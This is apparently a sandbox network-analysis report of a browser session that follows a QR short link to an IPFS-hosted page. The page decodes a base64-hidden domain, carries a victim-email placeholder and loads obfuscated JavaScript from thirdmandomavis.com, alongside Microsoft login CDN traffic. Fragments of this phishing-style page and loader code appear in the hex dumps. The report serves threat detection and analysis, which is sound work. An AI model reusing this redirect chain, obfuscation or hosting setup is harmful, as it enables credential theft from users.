Apr 16, 2024 11:43:58.426892042 CEST	49895	53	192.168.2.7	1.1.1.1
Apr 16, 2024 11:43:58.427186966 CEST	58681	53	192.168.2.7	1.1.1.1
Apr 16, 2024 11:43:58.530483007 CEST	53	60517	1.1.1.1	192.168.2.7
Apr 16, 2024 11:43:58.533807993 CEST	53	49895	1.1.1.1	192.168.2.7
Apr 16, 2024 11:43:58.534543037 CEST	53	58681	1.1.1.1	192.168.2.7
Apr 16, 2024 11:43:59.203368902 CEST	61198	53	192.168.2.7	1.1.1.1
Apr 16, 2024 11:43:59.203567028 CEST	57337	53	192.168.2.7	1.1.1.1
Apr 16, 2024 11:43:59.204530954 CEST	58064	53	192.168.2.7	1.1.1.1
Apr 16, 2024 11:43:59.204914093 CEST	60621	53	192.168.2.7	1.1.1.1
Apr 16, 2024 11:43:59.308289051 CEST	53	57337	1.1.1.1	192.168.2.7
Apr 16, 2024 11:43:59.308373928 CEST	53	61198	1.1.1.1	192.168.2.7
Apr 16, 2024 11:43:59.327203989 CEST	53	58064	1.1.1.1	192.168.2.7
Apr 16, 2024 11:43:59.331620932 CEST	53	60621	1.1.1.1	192.168.2.7
Apr 16, 2024 11:44:00.200244904 CEST	59833	53	192.168.2.7	1.1.1.1
Apr 16, 2024 11:44:00.204022884 CEST	57653	53	192.168.2.7	1.1.1.1
Apr 16, 2024 11:44:00.215372086 CEST	57913	53	192.168.2.7	1.1.1.1
Apr 16, 2024 11:44:00.215533972 CEST	51759	53	192.168.2.7	1.1.1.1
Apr 16, 2024 11:44:00.261569023 CEST	61656	53	192.168.2.7	1.1.1.1
Apr 16, 2024 11:44:00.261693954 CEST	58356	53	192.168.2.7	1.1.1.1
Apr 16, 2024 11:44:00.308175087 CEST	53	59833	1.1.1.1	192.168.2.7
Apr 16, 2024 11:44:00.310873032 CEST	53	57653	1.1.1.1	192.168.2.7
Apr 16, 2024 11:44:00.319483995 CEST	53	57913	1.1.1.1	192.168.2.7
Apr 16, 2024 11:44:00.319746017 CEST	53	51759	1.1.1.1	192.168.2.7
Apr 16, 2024 11:44:00.366516113 CEST	53	61656	1.1.1.1	192.168.2.7
Apr 16, 2024 11:44:00.367420912 CEST	53	58356	1.1.1.1	192.168.2.7
Apr 16, 2024 11:44:00.367960930 CEST	53	57067	1.1.1.1	192.168.2.7
Apr 16, 2024 11:44:00.422810078 CEST	53	62039	1.1.1.1	192.168.2.7
Apr 16, 2024 11:44:00.932209015 CEST	53	49224	1.1.1.1	192.168.2.7
Apr 16, 2024 11:44:01.036226988 CEST	58065	53	192.168.2.7	1.1.1.1
Apr 16, 2024 11:44:01.036457062 CEST	63807	53	192.168.2.7	1.1.1.1
Apr 16, 2024 11:44:01.140518904 CEST	53	58065	1.1.1.1	192.168.2.7
Apr 16, 2024 11:44:01.140619040 CEST	53	63807	1.1.1.1	192.168.2.7
Apr 16, 2024 11:44:02.276810884 CEST	54915	53	192.168.2.7	1.1.1.1
Apr 16, 2024 11:44:02.277118921 CEST	51489	53	192.168.2.7	1.1.1.1
Apr 16, 2024 11:44:02.381664991 CEST	53	54915	1.1.1.1	192.168.2.7
Apr 16, 2024 11:44:02.381684065 CEST	53	51489	1.1.1.1	192.168.2.7
Apr 16, 2024 11:44:15.212413073 CEST	123	123	192.168.2.7	168.61.215.74
Apr 16, 2024 11:44:15.355421066 CEST	123	123	168.61.215.74	192.168.2.7
Apr 16, 2024 11:44:15.606352091 CEST	53	63321	1.1.1.1	192.168.2.7
Apr 16, 2024 11:44:34.346466064 CEST	53	60100	1.1.1.1	192.168.2.7
Apr 16, 2024 11:44:56.660196066 CEST	53	58242	1.1.1.1	192.168.2.7
Apr 16, 2024 11:44:57.598381996 CEST	53	55314	1.1.1.1	192.168.2.7
Apr 16, 2024 11:45:08.126528025 CEST	138	138	192.168.2.7	192.168.2.255
Apr 16, 2024 11:45:25.344623089 CEST	53	59786	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 16, 2024 11:43:57.688565969 CEST	192.168.2.7	1.1.1.1	0x8ae2	Standard query (0)	www.qrfy.com	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:43:57.688566923 CEST	192.168.2.7	1.1.1.1	0xfbe1	Standard query (0)	www.qrfy.com	65	IN (0x0001)	false
Apr 16, 2024 11:43:58.426892042 CEST	192.168.2.7	1.1.1.1	0xe1b2	Standard query (0)	cloudflare-ipfs.com	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:43:58.427186966 CEST	192.168.2.7	1.1.1.1	0xdfb4	Standard query (0)	cloudflare-ipfs.com	65	IN (0x0001)	false
Apr 16, 2024 11:43:59.203368902 CEST	192.168.2.7	1.1.1.1	0x85a8	Standard query (0)	cdn.socket.io	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:43:59.203567028 CEST	192.168.2.7	1.1.1.1	0xa540	Standard query (0)	cdn.socket.io	65	IN (0x0001)	false
Apr 16, 2024 11:43:59.204530954 CEST	192.168.2.7	1.1.1.1	0x1344	Standard query (0)	thirdmandomavis.com	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:43:59.204914093 CEST	192.168.2.7	1.1.1.1	0xe552	Standard query (0)	thirdmandomavis.com	65	IN (0x0001)	false
Apr 16, 2024 11:44:00.200244904 CEST	192.168.2.7	1.1.1.1	0x7241	Standard query (0)	www.w3schools.com	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:44:00.204022884 CEST	192.168.2.7	1.1.1.1	0x3ebf	Standard query (0)	www.w3schools.com	65	IN (0x0001)	false
Apr 16, 2024 11:44:00.215372086 CEST	192.168.2.7	1.1.1.1	0x32c3	Standard query (0)	cdnjs.cloudflare.com	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:44:00.215533972 CEST	192.168.2.7	1.1.1.1	0x9bcd	Standard query (0)	cdnjs.cloudflare.com	65	IN (0x0001)	false
Apr 16, 2024 11:44:00.261569023 CEST	192.168.2.7	1.1.1.1	0x3995	Standard query (0)	aadcdn.msftauth.net	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:44:00.261693954 CEST	192.168.2.7	1.1.1.1	0x1acf	Standard query (0)	aadcdn.msftauth.net	65	IN (0x0001)	false
Apr 16, 2024 11:44:01.036226988 CEST	192.168.2.7	1.1.1.1	0xe35b	Standard query (0)	aadcdn.msftauth.net	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:44:01.036457062 CEST	192.168.2.7	1.1.1.1	0x84cd	Standard query (0)	aadcdn.msftauth.net	65	IN (0x0001)	false
Apr 16, 2024 11:44:02.276810884 CEST	192.168.2.7	1.1.1.1	0x64a7	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:44:02.277118921 CEST	192.168.2.7	1.1.1.1	0x55a9	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 16, 2024 11:43:57.798244953 CEST	1.1.1.1	192.168.2.7	0x8ae2	No error (0)	www.qrfy.com		104.18.20.78	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:43:57.798244953 CEST	1.1.1.1	192.168.2.7	0x8ae2	No error (0)	www.qrfy.com		104.18.21.78	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:43:57.812517881 CEST	1.1.1.1	192.168.2.7	0xfbe1	No error (0)	www.qrfy.com			65	IN (0x0001)	false
Apr 16, 2024 11:43:58.533807993 CEST	1.1.1.1	192.168.2.7	0xe1b2	No error (0)	cloudflare-ipfs.com		104.17.96.13	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:43:58.533807993 CEST	1.1.1.1	192.168.2.7	0xe1b2	No error (0)	cloudflare-ipfs.com		104.17.64.14	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:43:58.534543037 CEST	1.1.1.1	192.168.2.7	0xdfb4	No error (0)	cloudflare-ipfs.com			65	IN (0x0001)	false
Apr 16, 2024 11:43:59.308289051 CEST	1.1.1.1	192.168.2.7	0xa540	No error (0)	cdn.socket.io	d2vgu95hoyrpkh.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 16, 2024 11:43:59.308373928 CEST	1.1.1.1	192.168.2.7	0x85a8	No error (0)	cdn.socket.io	d2vgu95hoyrpkh.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 16, 2024 11:43:59.308373928 CEST	1.1.1.1	192.168.2.7	0x85a8	No error (0)	d2vgu95hoyrpkh.cloudfront.net		3.162.103.56	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:43:59.308373928 CEST	1.1.1.1	192.168.2.7	0x85a8	No error (0)	d2vgu95hoyrpkh.cloudfront.net		3.162.103.20	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:43:59.308373928 CEST	1.1.1.1	192.168.2.7	0x85a8	No error (0)	d2vgu95hoyrpkh.cloudfront.net		3.162.103.64	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:43:59.308373928 CEST	1.1.1.1	192.168.2.7	0x85a8	No error (0)	d2vgu95hoyrpkh.cloudfront.net		3.162.103.8	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:43:59.327203989 CEST	1.1.1.1	192.168.2.7	0x1344	No error (0)	thirdmandomavis.com		104.21.2.93	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:43:59.327203989 CEST	1.1.1.1	192.168.2.7	0x1344	No error (0)	thirdmandomavis.com		172.67.129.10	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:43:59.331620932 CEST	1.1.1.1	192.168.2.7	0xe552	No error (0)	thirdmandomavis.com			65	IN (0x0001)	false
Apr 16, 2024 11:44:00.308175087 CEST	1.1.1.1	192.168.2.7	0x7241	No error (0)	www.w3schools.com	cs837.wac.edgecastcdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 16, 2024 11:44:00.308175087 CEST	1.1.1.1	192.168.2.7	0x7241	No error (0)	cs837.wac.edgecastcdn.net		192.229.173.207	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:44:00.310873032 CEST	1.1.1.1	192.168.2.7	0x3ebf	No error (0)	www.w3schools.com	cs837.wac.edgecastcdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 16, 2024 11:44:00.319483995 CEST	1.1.1.1	192.168.2.7	0x32c3	No error (0)	cdnjs.cloudflare.com		104.17.24.14	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:44:00.319483995 CEST	1.1.1.1	192.168.2.7	0x32c3	No error (0)	cdnjs.cloudflare.com		104.17.25.14	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:44:00.319746017 CEST	1.1.1.1	192.168.2.7	0x9bcd	No error (0)	cdnjs.cloudflare.com			65	IN (0x0001)	false
Apr 16, 2024 11:44:00.364712000 CEST	1.1.1.1	192.168.2.7	0xd156	No error (0)	shed.dual-low.part-0012.t-0009.t-msedge.net	part-0012.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 16, 2024 11:44:00.364712000 CEST	1.1.1.1	192.168.2.7	0xd156	No error (0)	part-0012.t-0009.t-msedge.net		13.107.213.40	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:44:00.364712000 CEST	1.1.1.1	192.168.2.7	0xd156	No error (0)	part-0012.t-0009.t-msedge.net		13.107.246.40	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:44:00.365751028 CEST	1.1.1.1	192.168.2.7	0x3896	No error (0)	shed.dual-low.part-0012.t-0009.t-msedge.net	part-0012.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 16, 2024 11:44:00.365751028 CEST	1.1.1.1	192.168.2.7	0x3896	No error (0)	part-0012.t-0009.t-msedge.net		13.107.246.40	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:44:00.365751028 CEST	1.1.1.1	192.168.2.7	0x3896	No error (0)	part-0012.t-0009.t-msedge.net		13.107.213.40	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:44:00.366516113 CEST	1.1.1.1	192.168.2.7	0x3995	No error (0)	aadcdn.msftauth.net	cs1100.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 16, 2024 11:44:00.366516113 CEST	1.1.1.1	192.168.2.7	0x3995	No error (0)	cs1100.wpc.omegacdn.net		152.199.4.44	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:44:00.367420912 CEST	1.1.1.1	192.168.2.7	0x1acf	No error (0)	aadcdn.msftauth.net	cs1100.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 16, 2024 11:44:01.137084961 CEST	1.1.1.1	192.168.2.7	0xb0c0	No error (0)	shed.dual-low.part-0013.t-0009.t-msedge.net	part-0013.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 16, 2024 11:44:01.137084961 CEST	1.1.1.1	192.168.2.7	0xb0c0	No error (0)	part-0013.t-0009.t-msedge.net		13.107.246.41	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:44:01.137084961 CEST	1.1.1.1	192.168.2.7	0xb0c0	No error (0)	part-0013.t-0009.t-msedge.net		13.107.213.41	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:44:01.140518904 CEST	1.1.1.1	192.168.2.7	0xe35b	No error (0)	aadcdn.msftauth.net	cs1100.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 16, 2024 11:44:01.140518904 CEST	1.1.1.1	192.168.2.7	0xe35b	No error (0)	cs1100.wpc.omegacdn.net		152.199.4.44	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:44:01.140619040 CEST	1.1.1.1	192.168.2.7	0x84cd	No error (0)	aadcdn.msftauth.net	cs1100.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 16, 2024 11:44:01.307231903 CEST	1.1.1.1	192.168.2.7	0x3a2	No error (0)	shed.dual-low.part-0013.t-0009.t-msedge.net	part-0013.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 16, 2024 11:44:01.307231903 CEST	1.1.1.1	192.168.2.7	0x3a2	No error (0)	part-0013.t-0009.t-msedge.net		13.107.213.41	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:44:01.307231903 CEST	1.1.1.1	192.168.2.7	0x3a2	No error (0)	part-0013.t-0009.t-msedge.net		13.107.246.41	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:44:02.381664991 CEST	1.1.1.1	192.168.2.7	0x64a7	No error (0)	www.google.com		142.250.9.103	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:44:02.381664991 CEST	1.1.1.1	192.168.2.7	0x64a7	No error (0)	www.google.com		142.250.9.104	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:44:02.381664991 CEST	1.1.1.1	192.168.2.7	0x64a7	No error (0)	www.google.com		142.250.9.106	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:44:02.381664991 CEST	1.1.1.1	192.168.2.7	0x64a7	No error (0)	www.google.com		142.250.9.99	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:44:02.381664991 CEST	1.1.1.1	192.168.2.7	0x64a7	No error (0)	www.google.com		142.250.9.147	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:44:02.381664991 CEST	1.1.1.1	192.168.2.7	0x64a7	No error (0)	www.google.com		142.250.9.105	A (IP address)	IN (0x0001)	false
Apr 16, 2024 11:44:02.381684065 CEST	1.1.1.1	192.168.2.7	0x55a9	No error (0)	www.google.com			65	IN (0x0001)	false

HTTP Request Dependency Graph

www.qrfy.com

cloudflare-ipfs.com

https:

thirdmandomavis.com

cdn.socket.io

www.w3schools.com

aadcdn.msauth.net

logincdn.msauth.net

aadcdn.msftauth.net

cdnjs.cloudflare.com

fs.microsoft.com

slscr.update.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49700	104.18.20.78	443	3092	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 09:43:58 UTC	665	OUT	GET /hbfzkBMQ4s HTTP/1.1 Host: www.qrfy.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 09:43:58 UTC	753	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 16 Apr 2024 09:43:58 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Powered-By: Express Vary: Origin, Accept Access-Control-Allow-Credentials: true X-Country: US X-Robots-Tag: noindex, nofollow Cache-Control: no-cache Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Location: https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze# CF-Cache-Status: DYNAMIC Strict-Transport-Security: max-age=0 expect-ct: max-age=86400, enforce referrer-policy: same-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Server: cloudflare CF-RAY: 87533bed2af74507-ATL
2024-04-16 09:43:58 UTC	248	IN	Data Raw: 66 32 0d 0a 3c 70 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 69 70 66 73 2e 63 6f 6d 2f 69 70 66 73 2f 62 61 66 6b 72 65 69 63 6a 35 61 79 76 32 68 35 37 6f 69 70 75 68 68 69 77 6e 74 63 6d 6b 77 71 7a 62 6f 79 33 68 73 35 6b 37 36 66 77 73 77 66 66 34 62 71 36 35 6f 66 71 7a 65 23 22 3e 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 69 70 66 73 2e 63 6f 6d 2f 69 70 66 73 2f 62 61 66 6b 72 65 69 63 6a 35 61 79 76 32 68 35 37 6f 69 70 75 68 68 69 77 6e 74 63 6d 6b 77 71 7a 62 6f 79 33 68 73 35 6b 37 36 66 77 73 77 66 66 34 62 71 36 35 6f 66 71 7a 65 23 3c 2f 61 3e 3c 2f 70 3e 0d 0a Data Ascii: f2<p>Moved Permanently. Redirecting to <a href="https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze#">https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze#</a></p>
2024-04-16 09:43:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49703	104.17.96.13	443	3092	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 09:43:58 UTC	726	OUT	GET /ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze HTTP/1.1 Host: cloudflare-ipfs.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 09:43:59 UTC	1369	IN	HTTP/1.1 200 OK Date: Tue, 16 Apr 2024 09:43:59 GMT Content-Type: text/html Content-Length: 2875 Connection: close CF-Ray: 87533bf16d2c7ba0-ATL CF-Cache-Status: MISS Accept-Ranges: bytes Access-Control-Allow-Origin: * Cache-Control: public, max-age=29030400, immutable ETag: "bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze" Vary: Accept-Encoding access-control-allow-headers: Content-Type access-control-allow-headers: Range access-control-allow-headers: User-Agent access-control-allow-headers: X-Requested-With access-control-allow-methods: GET access-control-expose-headers: Content-Length access-control-expose-headers: Content-Range access-control-expose-headers: X-Chunked-Output access-control-expose-headers: X-Ipfs-Path access-control-expose-headers: X-Ipfs-Roots access-control-expose-headers: X-Stream-Output x-cf-ipfs-cache-status: miss x-ipfs-path: /ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze x-ipfs-roots: bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze Set-Cookie: __cf_bm=s3ichK8dkqJvZNMs9dn1gFFNqF9_5M3Jc44bFurcULg-1713260639-1.0.1.1-8p6i8spHiCTCsdiMFuGlJcGUy.a20re65qf.8D3N9SpiolEvBDXTAYWFTKUTm9_bs0vBUDeEXvZknBej23D6LQ; path=/; expires=Tue, 16-Apr-24 10:13:59 GMT; domain=.cloudflare-ipfs.com; HttpOnly; Secure; SameSite=None Server: cloudflare alt-svc: h3=":443"; ma=86400
2024-04-16 09:43:59 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-04-16 09:43:59 UTC	1367	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 70 6f 69 6e 74 3d 22 61 48 52 30 63 48 4d 36 4c 79 39 30 61 47 6c 79 5a 47 31 68 62 6d 52 76 62 57 46 32 61 58 4d 75 59 32 39 74 22 20 69 64 3d 22 68 74 6d 6c 22 20 73 74 69 3d 22 56 6c 5a 4f 52 6c 56 71 51 54 46 4e 52 45 31 35 54 55 52 4a 4d 46 5a 56 4e 55 70 56 56 6c 5a 47 54 55 52 4e 4d 55 31 36 51 58 70 4e 52 46 55 77 54 56 52 4a 64 30 31 71 55 58 6c 4e 52 45 6b 77 54 55 52 4e 64 30 35 55 56 58 70 4e 52 45 30 77 54 56 45 39 50 51 3d 3d 22 20 76 69 63 3d 22 5b 45 4d 61 69 6c 5d 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 69 64 3d 22 61 6c 6c 62 6f 64 79 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 3c 44 49 56 20 73 74 79 6c 65 3d Data Ascii: <!DOCTYPE html><html point="aHR0cHM6Ly90aGlyZG1hbmRvbWF2aXMuY29t" id="html" sti="VlZORlVqQTFNRE15TURJMFZVNUpVVlZGTURNMU16QXpNRFUwTVRJd01qUXlNREkwTURNd05UVXpNRE0wTVE9PQ==" vic="[EMail]" lang="en"><head></head><body id="allbody"> ... <DIV style=
2024-04-16 09:43:59 UTC	1369	IN	Data Raw: 75 6c 74 28 29 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 73 64 63 30 34 36 32 35 36 66 38 35 37 30 61 64 34 62 34 65 38 37 64 64 39 35 66 38 36 35 30 34 30 35 33 63 66 65 31 66 38 20 3d 20 61 74 6f 62 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 74 6d 6c 22 29 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 70 6f 69 6e 74 22 29 29 3b 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 73 64 63 30 34 36 32 35 36 66 38 35 37 30 61 64 34 62 34 65 38 37 64 64 39 35 66 38 36 35 30 34 30 35 33 63 66 65 31 66 38 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 73 62 35 31 63 32 34 63 33 66 66 61 34 34 66 61 38 65 35 37 66 61 63 34 31 65 33 38 36 36 65 30 38 31 62 61 32 66 33 32 33 5f 63 39 38 34 37 63 31 61 38 63 63 35 Data Ascii: ult()); var sdc046256f8570ad4b4e87dd95f86504053cfe1f8 = atob(document.getElementById("html").getAttribute("point")); console.log(sdc046256f8570ad4b4e87dd95f86504053cfe1f8); var sb51c24c3ffa44fa8e57fac41e3866e081ba2f323_c9847c1a8cc5
2024-04-16 09:43:59 UTC	139	IN	Data Raw: 33 3c 2f 53 50 41 4e 3e 20 3c 53 50 41 4e 3e 39 34 66 64 39 66 64 35 36 30 35 37 62 65 35 36 32 64 63 38 3c 2f 53 50 41 4e 3e 20 3c 53 50 41 4e 3e 64 63 37 61 39 32 31 62 35 30 31 32 62 39 36 36 66 37 34 33 3c 2f 53 50 41 4e 3e 20 3c 53 50 41 4e 3e 35 38 33 36 32 63 34 36 32 65 30 65 33 38 35 62 36 38 61 33 3c 2f 53 50 41 4e 3e 3c 2f 53 50 41 4e 3e 20 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e Data Ascii: 3</SPAN> <SPAN>94fd9fd56057be562dc8</SPAN> <SPAN>dc7a921b5012b966f743</SPAN> <SPAN>58362c462e0e385b68a3</SPAN></SPAN> --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49705	104.21.2.93	443	3092	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 09:43:59 UTC	527	OUT	GET /js.js HTTP/1.1 Host: thirdmandomavis.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://cloudflare-ipfs.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 09:43:59 UTC	777	IN	HTTP/1.1 200 OK Date: Tue, 16 Apr 2024 09:43:59 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 451435 Connection: close X-Powered-By: Express Access-Control-Allow-Origin: * Cache-Control: public, max-age=14400 Last-Modified: Tue, 02 Apr 2024 06:44:49 GMT ETag: W/"6e36b-18e9d8da3ba" CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G76sgXXYEGYiFMc5qm35IUwkP1hnN83i7P9bO0w9wiP24HCXQC419oY0G4Jd511%2B2T7UEUmp8e6o7qkVsC3lXNl6meQLYLIuBqXx8P8laHYmTI1xK%2FBD06jGwbbEXIIardctnYlk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87533bf66d4d6759-ATL alt-svc: h3=":443"; ma=86400
2024-04-16 09:43:59 UTC	592	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 65 36 32 28 29 20 7b 0a 20 20 20 20 63 6f 6e 73 74 20 5f 30 78 34 37 30 34 39 62 20 3d 20 5b 0a 20 20 20 20 20 20 20 20 27 73 73 69 4a 49 59 59 79 4d 63 27 2c 0a 20 20 20 20 20 20 20 20 27 6e 74 44 6f 63 73 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 27 2c 0a 20 20 20 20 20 20 20 20 27 4d 43 53 6b 4d 4c 6f 6c 48 38 27 2c 0a 20 20 20 20 20 20 20 20 27 66 79 2d 69 74 65 6d 73 3a 5c 78 32 30 27 2c 0a 20 20 20 20 20 20 20 20 27 32 38 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 27 2c 0a 20 20 20 20 20 20 20 20 27 6f 6e 74 2d 73 69 7a 65 3a 5c 78 32 30 27 2c 0a 20 20 20 20 20 20 20 20 27 73 45 76 41 68 43 78 77 4a 6d 27 2c 0a 20 20 20 20 20 20 20 20 27 52 51 65 57 55 55 55 55 42 52 27 2c 0a 20 20 20 20 20 20 20 Data Ascii: function _0x5e62() { const _0x47049b = [ 'ssiJIYYyMc', 'ntDocs\x20{\x0a\x20', 'MCSkMLolH8', 'fy-items:\x20', '280px;\x0a\x20\x20\x20', 'ont-size:\x20', 'sEvAhCxwJm', 'RQeWUUUUBR',
